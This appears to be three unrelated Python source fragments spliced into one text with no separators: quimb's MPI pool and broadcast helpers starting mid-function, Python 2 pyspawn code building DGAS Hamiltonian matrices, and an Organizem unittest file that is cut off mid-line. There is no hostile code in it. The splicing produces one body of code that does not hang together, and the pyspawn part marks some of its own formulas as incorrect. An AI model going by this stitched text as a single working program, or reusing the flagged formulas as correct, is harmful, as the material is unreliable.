rank = comm.Get_rank() # make sure all workers know if result is an array or not if rank == result_rank: is_ndarray = isinstance(result, np.ndarray) else: is_ndarray = None is_ndarray = comm.bcast(is_ndarray, root=result_rank) # standard (pickle) bcast if not array if not is_ndarray: return comm.bcast(result, root=result_rank) # make sure all workers have shape and dtype if rank == result_rank: shape_dtype = result.shape, str(result.dtype) else: shape_dtype = None shape_dtype = comm.bcast(shape_dtype, root=result_rank) shape, dtype = shape_dtype # allocate data space if rank != result_rank: result = np.empty(shape, dtype=dtype) # use fast communication for main array comm.Bcast(result, root=result_rank) return result class SyncroFuture: def __init__(self, result, result_rank, comm): self._result = result self.result_rank = result_rank self.comm = comm def result(self): rank = self.comm.Get_rank() if rank == self.result_rank: should_it = (isinstance(self._result, tuple) and any(isinstance(x, np.ndarray) for x in self._result)) if should_it: iterate_over = len(self._result) else: iterate_over = 0 else: iterate_over = None iterate_over = self.comm.bcast(iterate_over, root=self.result_rank) if iterate_over: if rank != self.result_rank: self._result = (None,) * iterate_over result = tuple(bcast(x, self.comm, self.result_rank) for x in self._result) else: result = bcast(self._result, self.comm, self.result_rank) return result @staticmethod def cancel(): raise ValueError("SyncroFutures cannot be cancelled - they are " "submitted in a parallel round-robin fasion where " "each worker immediately computes all its results.") class SynchroMPIPool: def __init__(self): import itertools from mpi4py import MPI self.comm = MPI.COMM_WORLD self.size = self.comm.Get_size() self.rank = self.comm.Get_rank() self.counter = itertools.cycle(range(0, NUM_MPI_WORKERS)) self._max_workers = self.size def submit(self, fn, *args, **kwargs): # round robin iterate through ranks current_counter = next(self.counter) # accept job and compute if have the same rank, else do nothing if current_counter == self.rank: res = fn(*args, **kwargs) else: res = None # wrap the result in a SyncroFuture, that will broadcast result return SyncroFuture(res, current_counter, self.comm) def shutdown(self): pass class CachedPoolWithShutdown: """Decorator for caching the mpi pool when called with the equivalent args, and shutting down previous ones when not needed. """ def __init__(self, pool_fn): self._settings = '__UNINITIALIZED__' self._pool_fn = pool_fn def __call__(self, num_workers=None, num_threads=1): # convert None to default so the cache the same if num_workers is None: num_workers = NUM_MPI_WORKERS elif ALREADY_RUNNING_AS_MPI and (num_workers != NUM_MPI_WORKERS): raise ValueError("Can't specify number of processes when running " "under MPI rather than spawning processes.") # first call if self._settings == '__UNINITIALIZED__': self._pool = self._pool_fn(num_workers, num_threads) self._settings = (num_workers, num_threads) # new type of pool requested elif self._settings != (num_workers, num_threads): self._pool.shutdown() self._pool = self._pool_fn(num_workers, num_threads) self._settings = (num_workers, num_threads) return self._pool @CachedPoolWithShutdown def get_mpi_pool(num_workers=None, num_threads=1): """Get the MPI executor pool, with specified number of processes and threads per process. """ if (num_workers == 1) and (num_threads == _NUM_THREAD_WORKERS): from concurrent.futures import ProcessPoolExecutor return ProcessPoolExecutor(1) if USE_SYNCRO: return SynchroMPIPool() from mpi4py.futures import MPIPoolExecutor return MPIPoolExecutor(num_workers, main=False, env={'OMP_NUM_THREADS': str(num_threads), 'QUIMB_NUM_MPI_WORKERS': str(num_workers), '_QUIMB_MPI_LAUNCHED': 'SPAWNED'}) class GetMPIBeforeCall(object): """Wrap a function to automatically get the correct communicator before its called, and to set the `comm_self` kwarg to allow forced self mode. This is called by every mpi process before the function evaluation. """ def __init__(self, fn): self.fn = fn def __call__(self, *args, comm_self=False, wait_for_workers=None, **kwargs): """ Parameters ---------- *args : Supplied to self.fn comm_self : bool, optional Whether to force use of MPI.COMM_SELF wait_for_workers : int, optional If set, wait for the communicator to have this many workers, this can help to catch some errors regarding expected worker numbers. **kwargs : Supplied to self.fn """ from mpi4py import MPI if not comm_self: comm = MPI.COMM_WORLD else: comm = MPI.COMM_SELF if wait_for_workers is not None: from time import time t0 = time() while comm.Get_size() != wait_for_workers: if time() - t0 > 2: raise RuntimeError( f"Timeout while waiting for {wait_for_workers} " f"workers to join comm {comm}.") comm.Barrier() res = self.fn(*args, comm=comm, **kwargs) comm.Barrier() return res class SpawnMPIProcessesFunc(object): """Automatically wrap a function to be executed in parallel by a pool of mpi workers. This is only called by the master mpi process in manual mode, only by the (non-mpi) spawning process in automatic mode, or by all processes in syncro mode. """ def __init__(self, fn): self.fn = fn def __call__(self, *args, num_workers=None, num_threads=1, mpi_pool=None, spawn_all=USE_SYNCRO or (not ALREADY_RUNNING_AS_MPI), **kwargs): """ Parameters ---------- *args Supplied to `self.fn`. num_workers : int, optional How many total process should run function in parallel. num_threads : int, optional How many (OMP) threads each process should use mpi_pool : pool-like, optional If not None (default), submit function to this pool. spawn_all : bool, optional Whether all the parallel processes should be spawned (True), or num_workers - 1, so that the current process can also do work. **kwargs Supplied to `self.fn`. Returns ------- `fn` output from the master process. """ if num_workers is None: num_workers = NUM_MPI_WORKERS if num_workers == 1: # no pool or communicator required return self.fn(*args, comm_self=True, **kwargs) kwargs['wait_for_workers'] = num_workers if mpi_pool is not None: pool = mpi_pool else: pool = get_mpi_pool(num_workers, num_threads) # the (non mpi) main process is idle while the workers compute. if spawn_all: futures = [pool.submit(self.fn, *args, **kwargs) for _ in range(num_workers)] results = [f.result() for f in futures] # the master process is the master mpi process and contributes else: futures = [pool.submit(self.fn, *args, **kwargs) for _ in range(num_workers - 1)] results = ([self.fn(*args, **kwargs)] + [f.result() for f in futures]) # Get master result, (not always first submitted) return next(r for r in results if r is not None) # ---------------------------------- SLEPC ---------------------------------- # eigs_slepc_mpi = functools.wraps(eigs_slepc)( GetMPIBeforeCall(eigs_slepc)) eigs_slepc_spawn = functools.wraps(eigs_slepc)( SpawnMPIProcessesFunc(eigs_slepc_mpi)) svds_slepc_mpi = functools.wraps(svds_slepc)( GetMPIBeforeCall(svds_slepc)) svds_slepc_spawn = functools.wraps(svds_slepc)( SpawnMPIProcessesFunc(svds_slepc_mpi)) mfn_multiply_slepc_mpi = functools.wraps(mfn_multiply_slepc)( GetMPIBeforeCall(mfn_multiply_slepc)) mfn_multiply_slepc_spawn = functools.wraps(mfn_multiply_slepc)( SpawnMPIProcessesFunc(mfn_multiply_slepc_mpi)) ssolve_slepc_mpi = functools.wraps(ssolve_slepc)( GetMPIBeforeCall(ssolve_slepc)) ssolve_slepc_spawn = functools.wraps(ssolve_slepc)( SpawnMPIProcessesFunc(ssolve_slepc_mpi))
import numpy as np import pyspawn.complexgaussian as cg ###################################################### # adiabatic Hamiltonian ###################################################### # build Heff for the first half of the time step in the adibatic rep # (with NPI) def build_Heff_first_half(self): self.get_qm_data_from_h5() self.get_qm_data_from_h5_next_time() qm_time = self.get_quantum_time() dt = self.get_timestep() t_half = qm_time + 0.5 * dt self.set_quantum_time_half_step(t_half) self.get_qm_data_from_h5_half_step() self.build_DGAS_coeffs() self.build_S_elec_DGAS() self.build_S_DGAS() self.invert_S() self.build_Sdot_nuc_DGAS() self.build_Sdot_elec_DGAS() self.build_Sdot_DGAS() self.build_H_DGAS() self.build_Heff() # build Heff for the second half of the time step in the adibatic rep # (with NPI) def build_Heff_second_half(self): self.get_qm_data_from_h5() qm_time = self.get_quantum_time() dt = self.get_timestep() t_half = qm_time - 0.5 * dt self.set_quantum_time_half_step(t_half) self.get_qm_data_from_h5_half_step() # don't need to do this - fix soon self.build_DGAS_coeffs() self.build_S_elec_DGAS() self.build_Sdot_DGAS() self.build_S_DGAS() self.invert_S() self.build_Sdot_DGAS() self.build_H_DGAS() self.build_Heff() # get the position at the next time step def get_qm_data_from_h5_next_time(self): qm_time = self.get_quantum_time() + self.get_timestep() ntraj = self.get_num_traj_qm() for key in self.traj: if self.traj_map[key] < ntraj: self.traj[key].get_all_qm_data_at_time_from_h5(qm_time,suffix="_next") for key in self.centroids: key1, key2 = str.split(key,"_a_") if self.traj_map[key1] < ntraj and self.traj_map[key2] < ntraj: self.centroids[key].get_all_qm_data_at_time_from_h5(qm_time,suffix="_next") # build DGAS coefficients def build_DGAS_coeffs(self): ntraj = self.get_num_traj_qm() nstat = self.traj.itervalues().next().get_numstates() #dc = dict() #for keyi in self.traj: # i = self.traj_map[keyi] # if i < ntraj: # nstat = self.traj[keyi].get_numstates() # ist = self.traj[keyi].get_istate() # dc[keyi] = np.zeros(nstat) # dc[keyi][ist] = 1.0 #self.dgas_coeffs = np.zeros((ntraj,nstat)) #for keyi in self.traj: # i = self.traj_map[keyi] # if i < ntraj: # self.dgas_coeffs[i,:] = dc[keyi] self.dgas_coeffs = np.zeros((ntraj,ntraj,nstat)) self.dgas_coeffs_next_time = np.zeros((ntraj,ntraj,nstat)) for keycent in self.centroids: keyi, keyj = str.split(keycent,"_a_") i = self.traj_map[keyi] j = self.traj_map[keyj] if i < ntraj and j < ntraj: #nstat = self.traj[keyi].get_numstates() ist = self.traj[keyi].get_istate() jst = self.traj[keyj].get_istate() dc = np.zeros(nstat) dc[ist] = 1.0 self.dgas_coeffs[i,j,:] = dc dc = np.zeros(nstat) dc[jst] = 1.0 self.dgas_coeffs[j,i,:] = dc dc = np.zeros(nstat) dc[ist] = 1.0 self.dgas_coeffs_next_time[i,j,:] = dc dc = np.zeros(nstat) dc[jst] = 1.0 self.dgas_coeffs_next_time[j,i,:] = dc #for keycent in self.centroids: # keyi, keyj = str.split(keycent,"_a_") # i = self.traj_map[keyi] # j = self.traj_map[keyj] # if i < ntraj and j < ntraj: # self.dgas_coeffs[i,j,:] is the DGAS coefficient vector for # the elec wf of trajectory i at centroid i,j. Thus, # self.dgas_coeffs[i,j,:] /= self.dgas_coeffs[j,i,:] # self.dgas_coeffs[i,j,:] = dc[keyi] # build matrix of electronic overlaps def build_S_elec_DGAS(self): ntraj = self.get_num_traj_qm() self.S_elec = np.zeros((ntraj,ntraj)) for keyi in self.traj: i = self.traj_map[keyi] if i < ntraj: for keyj in self.traj: j = self.traj_map[keyj] if j < ntraj: if i == j: self.S_elec[i,j] = 1.0 else: Stmp = np.dot(self.dgas_coeffs[i,j,:],self.dgas_coeffs[j,i,:]) self.S_elec[i,j] = Stmp # build the overlap matrix, S def build_S_DGAS(self): ntraj = self.get_num_traj_qm() self.S = np.zeros((ntraj,ntraj), dtype=np.complex128) self.S_nuc = np.zeros((ntraj,ntraj), dtype=np.complex128) for keyi in self.traj: i = self.traj_map[keyi] if i < ntraj: for keyj in self.traj: j = self.traj_map[keyj] if j < ntraj: self.S_nuc[i,j] = cg.overlap_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm") self.S[i,j] = self.S_nuc[i,j] * self.S_elec[i,j] # build the right-acting time derivative operator def build_Sdot_nuc_DGAS(self): ntraj = self.get_num_traj_qm() self.Sdot_nuc = np.zeros((ntraj,ntraj), dtype=np.complex128) for keyi in self.traj: i = self.traj_map[keyi] if i < ntraj: for keyj in self.traj: j = self.traj_map[keyj] if j < ntraj: self.Sdot_nuc[i,j] = cg.Sdot_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm",forces_j="forces_i_qm") * self.S_elec[i,j] def build_Sdot_elec_DGAS(self): ntraj = self.get_num_traj_qm() nstat = self.traj.itervalues().next().get_numstates() self.Sdot_elec = np.zeros((ntraj,ntraj), dtype=np.complex128) for keycent in self.centroids: keyi, keyj = str.split(keycent,"_a_") i = self.traj_map[keyi] j = self.traj_map[keyj] if i < ntraj and j < ntraj: # calculate NPI derivative coupling (as defined in the DGAS paper) S_ad = self.centroids[keycent].get_S_elec_flat().reshape((nstat,nstat)) print "S_ad", S_ad sii = np.dot(self.dgas_coeffs[i,j,:],np.matmul(S_ad,self.dgas_coeffs_next_time[i,j,:])) sjj = np.dot(self.dgas_coeffs[j,i,:],np.matmul(S_ad,self.dgas_coeffs_next_time[j,i,:])) sij = np.dot(self.dgas_coeffs[i,j,:],np.matmul(S_ad,self.dgas_coeffs_next_time[j,i,:])) sji = np.dot(self.dgas_coeffs[j,i,:],np.matmul(S_ad,self.dgas_coeffs_next_time[i,j,:])) print "sii", sii, sij, sji, sjj vinorm = np.sqrt(1.0 - sii*sii) vjnorm = np.sqrt(1.0 - sjj*sjj) xixj = np.dot(self.dgas_coeffs[i,j,:],self.dgas_coeffs[j,i,:]) if vjnorm < 1.0e-6: xivj = 0.0 else: xivj = (sij - xixj * sjj) / vjnorm if vinorm < 1.0e-6: vixj = 0.0 else: vixj = (sji - xixj * sii) / vinorm xixj_next = np.dot(self.dgas_coeffs_next_time[i,j,:],self.dgas_coeffs_next_time[j,i,:]) if vjnorm >= 1.0e-6 and vinorm >= 1.0e-6: vivj = (xixj_next - sii*sij - sji*sjj + sii*xixj*sjj) / (vinorm*vjnorm) else: vivj = 0.0 print "xixj", xixj, xivj, vixj, vivj acii = np.arccos(sii) acjj = np.arccos(sjj) print "acii, acjj", acii, acjj #ADtmp = acjj*acjj-acii*acii BCtmp1 = acii-acjj BCtmp2 = acii+acjj if np.absolute(BCtmp1) < 1.0e-6: BCtmp3 = 1.0 else: BCtmp3 = np.sin(BCtmp1) / BCtmp1 if np.absolute(BCtmp2) < 1.0e-6: BCtmp4 = 1.0 else: BCtmp4 = np.sin(BCtmp2) / BCtmp2 B = 0.5 * xivj * acjj * (BCtmp3 + BCtmp4) C = -0.5 * vixj * acjj * (BCtmp3 + BCtmp4) if np.absolute(sjj-sii) < 1.0e-6: A = xixj * acjj * (sii*sjj-1.0) D = vivj * acjj * (sii*sjj-1.0) else: A = xixj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acii + (sii*sjj-1.0)*acjj) / (acjj*acjj-acii*acii) D = vivj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acjj + (sii*sjj-1.0)*acii) / (acjj*acjj-acii*acii) h = self.traj[keyi].get_timestep() print "ABCDh", A, B, C, D, h Sdot_tmp = 1.0 / h * ( A + B + C + D ) self.Sdot_elec[i,j] = self.S_nuc[i,j] * Sdot_tmp print "self.Sdot_elec[i,j]", i, j, self.Sdot_elec[i,j], self.Sdot_nuc[i,j] # THIS IS NOT CORRECT! #self.Sdot_elec[j,i] = -1.0*np.conj(self.Sdot_elec[i,j]) #print "self.Sdot_elec[j,i]", i, j, self.Sdot_elec[j,i], self.Sdot_nuc[i,j] # Compute [j,i] elements correctly! stmp = sii sii = sjj sjj = stmp stmp = sij sij = sji sji = stmp print "sii", sii, sij, sji, sjj vinorm = np.sqrt(1.0 - sii*sii) vjnorm = np.sqrt(1.0 - sjj*sjj) xixj = np.dot(self.dgas_coeffs[j,i,:],self.dgas_coeffs[i,j,:]) if vjnorm < 1.0e-6: xivj = 0.0 else: xivj = (sij - xixj * sjj) / vjnorm if vinorm < 1.0e-6: vixj = 0.0 else: vixj = (sji - xixj * sii) / vinorm xixj_next = np.dot(self.dgas_coeffs_next_time[j,i,:],self.dgas_coeffs_next_time[i,j,:]) if vjnorm >= 1.0e-6 and vinorm >= 1.0e-6: vivj = (xixj_next - sii*sij - sji*sjj + sii*xixj*sjj) / (vinorm*vjnorm) else: vivj = 0.0 print "xixj", xixj, xivj, vixj, vivj acii = np.arccos(sii) acjj = np.arccos(sjj) print "acii, acjj", acii, acjj #ADtmp = acjj*acjj-acii*acii BCtmp1 = acii-acjj BCtmp2 = acii+acjj if np.absolute(BCtmp1) < 1.0e-6: BCtmp3 = 1.0 else: BCtmp3 = np.sin(BCtmp1) / BCtmp1 if np.absolute(BCtmp2) < 1.0e-6: BCtmp4 = 1.0 else: BCtmp4 = np.sin(BCtmp2) / BCtmp2 B = 0.5 * xivj * acjj * (BCtmp3 + BCtmp4) C = -0.5 * vixj * acjj * (BCtmp3 + BCtmp4) if np.absolute(sjj-sii) < 1.0e-6: A = xixj * acjj * (sii*sjj-1.0) D = vivj * acjj * (sii*sjj-1.0) else: A = xixj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acii + (sii*sjj-1.0)*acjj) / (acjj*acjj-acii*acii) D = vivj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acjj + (sii*sjj-1.0)*acii) / (acjj*acjj-acii*acii) h = self.traj[keyi].get_timestep() print "ABCDh", A, B, C, D, h Sdot_tmp = 1.0 / h * ( A + B + C + D ) self.Sdot_elec[j,i] = self.S_nuc[j,i] * Sdot_tmp print "self.Sdot_elec[j,i]", i, j, self.Sdot_elec[j,i], self.Sdot_nuc[j,i] def build_Sdot_DGAS(self): self.Sdot = self.Sdot_nuc + self.Sdot_elec # build the Hamiltonian matrix, H # This routine assumes that S is already built def build_H_DGAS(self): print "# building potential energy matrix" self.build_V_DGAS() print "# building NAC matrix" #self.build_tau_DGAS() print "# building kinetic energy matrix" self.build_T_DGAS() ntraj = self.get_num_traj_qm() shift = self.get_qm_energy_shift() * np.identity(ntraj) print "# summing Hamiltonian" #self.H = self.T + self.V + self.tau + shift self.H = self.T + self.V + shift # build the potential energy matrix, V # This routine assumes that S is already built def build_V_DGAS(self): c1i = (complex(0.0,1.0)) cm1i = (complex(0.0,-1.0)) ntraj = self.get_num_traj_qm() self.V = np.zeros((ntraj,ntraj),dtype=np.complex128) for key in self.traj: i = self.traj_map[key] istate = self.traj[key].get_istate() if i < ntraj: self.V[i,i] = self.traj[key].get_energies_qm()[istate] for key in self.centroids: keyi, keyj = str.split(key,"_a_") i = self.traj_map[keyi] j = self.traj_map[keyj] if i < ntraj and j < ntraj: istate = self.centroids[key].get_istate() jstate = self.centroids[key].get_jstate() nstates = self.centroids[key].get_numstates() #if istate == jstate: #BGL this is not correct and must be fixed later E = self.centroids[key].get_energies_qm() for ist in range(nstates): Etmp = self.dgas_coeffs[i,j,ist] * self.dgas_coeffs[j,i,ist] * E[ist] self.V[i,j] += Etmp * self.S_nuc[i,j] self.V[j,i] += Etmp * self.S_nuc[j,i] # build the nonadiabatic coupling matrix, tau # This routine assumes that S is already built #def build_tau_DGAS(self): # c1i = (complex(0.0,1.0)) # cm1i = (complex(0.0,-1.0)) # ntraj = self.get_num_traj_qm() # self.tau = np.zeros((ntraj,ntraj),dtype=np.complex128) # for key in self.centroids: # keyi, keyj = str.split(key,"_a_") # i = self.traj_map[keyi] # j = self.traj_map[keyj] # if i < ntraj and j < ntraj: # istate = self.centroids[key].get_istate() # jstate = self.centroids[key].get_jstate() # if istate != jstate: # Sij = cg.overlap_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm") # tdc = self.centroids[key].get_timederivcoups_qm()[jstate] # self.tau[i,j] = Sij * cm1i * tdc # self.tau[j,i] = Sij.conjugate() * c1i * tdc # build the kinetic energy matrix, T def build_T_DGAS(self): ntraj = self.get_num_traj_qm() self.T = np.zeros((ntraj,ntraj), dtype=np.complex128) for keyi in self.traj: i = self.traj_map[keyi] if i < ntraj: for keyj in self.traj: j = self.traj_map[keyj] if j < ntraj: self.T[i,j] = cg.kinetic_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm") * self.S_elec[i,j]
import unittest import sys sys.path.insert(0, '..') from lib.item import Item, Elem from lib.organizem import Organizem, Conf from lib.orgm_controller_base import ActionArg TEST_DATA_FILE = "orgm_test.dat" TEST_BAK_FILE = "orgm_test_bak.dat" IS_UNIT_TESTING = True Organizem(TEST_DATA_FILE, IS_UNIT_TESTING).setconf(Conf.BAK_FILE, TEST_BAK_FILE) class OrganizemTestCase(unittest.TestCase): # Helpers def _init_test_data_file(self): with open(TEST_DATA_FILE, 'w') as f: item = Item("TEST_ITEM") f.write(str(item)) # Tests def test_init_item(self): title = "title" item = Item(title) self.assertTrue(item != None) self.assertTrue(isinstance(item, Item)) self.assertTrue(item.title == title) def test_init_organizem(self): self._init_test_data_file() orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) self.assertTrue(orgm != None) self.assertTrue(isinstance(orgm, Organizem)) self.assertTrue(orgm.data_file == TEST_DATA_FILE) def test_add_item__find_item_by_title(self): self._init_test_data_file() title = "title" item = Item(title) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.TITLE, title)) def test_add_item__find_rgx_item_by_title(self): self._init_test_data_file() title = "title" rgx_match = "titl*" item = Item(title) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True)) def test_add_item__find_items_by_area(self): self._init_test_data_file() title = "title" area = "my area" item = Item(title, {Elem.AREA : area}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.AREA, area)) def test_add_item__find_rgx_item_by_area(self): self._init_test_data_file() title = "title" area = "area" rgx_match = "are*" item = Item(title, {Elem.AREA : area}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True)) def test_add_item__find_items_by_project(self): self._init_test_data_file() title = "title" project = "my project" item = Item(title, {Elem.PROJECT : project}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.PROJECT, project)) def test_add_item__find_rgx_items_by_project(self): self._init_test_data_file() title = "title" project = "my project" rgx_match = "my proj*" item = Item(title, {Elem.PROJECT : project}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.PROJECT, rgx_match, use_regex_match=True)) def test_add_item__find_items_by_tags(self): self._init_test_data_file() title = "title" # Test case of single-value passed to find_items() for a # element that is stored in item as a list (tags) tag1 = 'tag 1' tags1 = [tag1] item1 = Item(title, {Elem.TAGS : tags1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.TAGS, tag1)) # Test case of multi-value list passed to find_items() for a # element that is stored in item as a list (tags) tag2 = 'tag 2' tags2 = [tag1, tag2] item2 = Item(title, {Elem.TAGS : tags2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.TAGS, tag2)) self.assertTrue(orgm.find_items(Elem.TAGS, tags2)) def test_add_item__find_rgx_items_by_tags(self): self._init_test_data_file() title = "title" # Test case of single-value passed to find_items() for a # element that is stored in item as a list (tags) tag1 = 'tag 1001' tag1_rgx = 'tag 100*' tags1 = [tag1] item1 = Item(title, {Elem.TAGS : tags1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.TAGS, tag1_rgx, use_regex_match=True)) # Test case of multi-value list passed to find_items() for a # element that is stored in item as a list (tags) tag2 = 'tag 1012' tag2_rgx = 'tag 101*' tags2 = [tag1, tag2] item2 = Item(title, {Elem.TAGS : tags2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.TAGS, tag2_rgx, use_regex_match=True)) def test_add_item__find_items_by_actions(self): self._init_test_data_file() title = "title" action1 = 'action 100' action1_rgx = 'action 10*' actions1 = [action1] # TODO FIX ALL THESE Itme() ctor calls item1 = Item(title, {Elem.ACTIONS : actions1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True)) action2 = 'action 200' actions2 = [action1, action2] item2 = Item(title, {Elem.ACTIONS : actions2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.ACTIONS, action2)) self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2)) def test_add_item__find_rgx_items_by_actions(self): self._init_test_data_file() title = "title" # Test case of single-value passed to find_items() for a # element that is stored in item as a list (tags) action1 = 'action 1010' action1_rgx = 'action 101*' actions1 = [action1] item1 = Item(title, {Elem.ACTIONS : actions1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True)) # Test case of multi-value list passed to find_items() for a # element that is stored in item as a list (tags) action2 = 'action 1020' action2_rgx = 'action 102*' actions2 = [action1, action2] item2 = Item(title, {Elem.ACTIONS : actions2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.ACTIONS, action2_rgx, use_regex_match=True)) def test_add_item__find_items_by_priority(self): self._init_test_data_file() title = "title" priority = "P1" item = Item(title, {Elem.PRIORITY : priority}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.PRIORITY, priority)) def test_add_item__find_rgx_items_by_priority(self): self._init_test_data_file() title = "title" priority = "P1" rgx_match = "P*" item = Item(title, {Elem.PRIORITY : priority}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.PRIORITY, rgx_match, use_regex_match=True)) def test_add_item__find_items_by_note(self): self._init_test_data_file() title = "title" note = """* Support for reporting on metadata ** all titles (alpha order, due date order) ** all projects (alpha order) ** all areas (alpha order) ** all tags (alpha order) ** all actions (grouped by item, item next due date order) http://www.snippy.com ljalj; a dafs asdfdsa wkwjl;qq;q;""" item = Item(title, {Elem.NOTE : note}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.NOTE, note)) def test_add_item__find_rgx_items_by_note(self): self._init_test_data_file() title = "title" note = """* Support for reporting on metadata ** all titles (alpha order, due date order) ** all projects (alpha order) ** all areas (alpha order) ** all tags (alpha order) ** all actions (grouped by item, item next due date order) http://www.snippy.com ljalj; a dafs asdfdsa wkwjl;qq;q;""" note_rgx = "\* Support for reporting *" item = Item(title, {Elem.NOTE : note}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True)) def test_remove_items_rgx_by_title(self): self._init_test_data_file() title = "title" rgx_match = "titl*" item = Item(title) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True)) # NOTE: Now remove the item and check that it's not there any more orgm.remove_items(Elem.TITLE, rgx_match, use_regex_match=True) self.assertFalse(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True)) def test_remove_items_rgx_by_area(self): self._init_test_data_file() title = "title" area = "area" rgx_match = "are*" item = Item(title, {Elem.AREA : area}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True)) orgm.remove_items(Elem.AREA, rgx_match, use_regex_match=True) self.assertFalse(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True)) def test_remove_items_by_project(self): self._init_test_data_file() title = "title" project = "project" item = Item(title, {Elem.PROJECT : project}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.PROJECT, project)) orgm.remove_items(Elem.PROJECT, project) self.assertFalse(orgm.find_items(Elem.PROJECT, project)) def test_remove_items_by_tags(self): self._init_test_data_file() title = "title" tag1 = 'tag 1' tags1 = [tag1] item1 = Item(title, {Elem.TAGS : tags1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.TAGS, tag1)) orgm.remove_items(Elem.TAGS, tag1) self.assertFalse(orgm.find_items(Elem.TAGS, tag1)) tag2 = 'tag 2' tags2 = [tag1, tag2] item2 = Item(title, {Elem.TAGS : tags2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.TAGS, tag2)) self.assertTrue(orgm.find_items(Elem.TAGS, tags2)) orgm.remove_items(Elem.TAGS, tags2) self.assertFalse(orgm.find_items(Elem.TAGS, tags2)) def test_remove_items_rgx_by_actions(self): self._init_test_data_file() title = "title" action1 = 'action 110' rgx_match = "action 11*" actions1 = [action1] item1 = Item(title, {Elem.ACTIONS : actions1}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item1) self.assertTrue(orgm.find_items(Elem.ACTIONS, action1)) orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True) self.assertFalse(orgm.find_items(Elem.ACTIONS, action1)) action2 = 'action 101' rgx_match = "action 10*" actions2 = [action1, action2] item2 = Item(title, {Elem.ACTIONS : actions2}) orgm.add_item(item2) self.assertTrue(orgm.find_items(Elem.ACTIONS, action2)) self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2)) orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True) self.assertFalse(orgm.find_items(Elem.ACTIONS, actions2)) def test_remove_items_by_note(self): self._init_test_data_file() title = "title" note = """* Support for reporting on metadata ** all titles (alpha order, due date order) ** all projects (alpha order) ** all areas (alpha order) ** all tags (alpha order) ** all actions (grouped by item, item next due date order) http://www.snippy.com ljalj; a dafs asdfdsa wkwjl;qq;q;""" item = Item(title, {Elem.NOTE : note}) orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING) orgm.add_item(item) self.assertTrue(orgm.find_items(Elem.NOTE, note)) orgm.remove_items(Elem.NOTE, note) self.assertFalse(orgm.find_items(Elem.NOTE, note)) def test_remove_items_rgx_by_note(self): self._init_test_data_file() title = "title" note = """* Support for reporting on metadata ** all titles (alpha order, due date order) ** all projects (alpha order) ** all areas (alpha order) ** all tags (alpha order) ** all actions (grouped by item, item next due date order) http://www.snippy.com ljalj; a dafs asdfdsa wkwjl;qq;q;""" note_rgx = "\* Support for reporting *" item = Item(title, 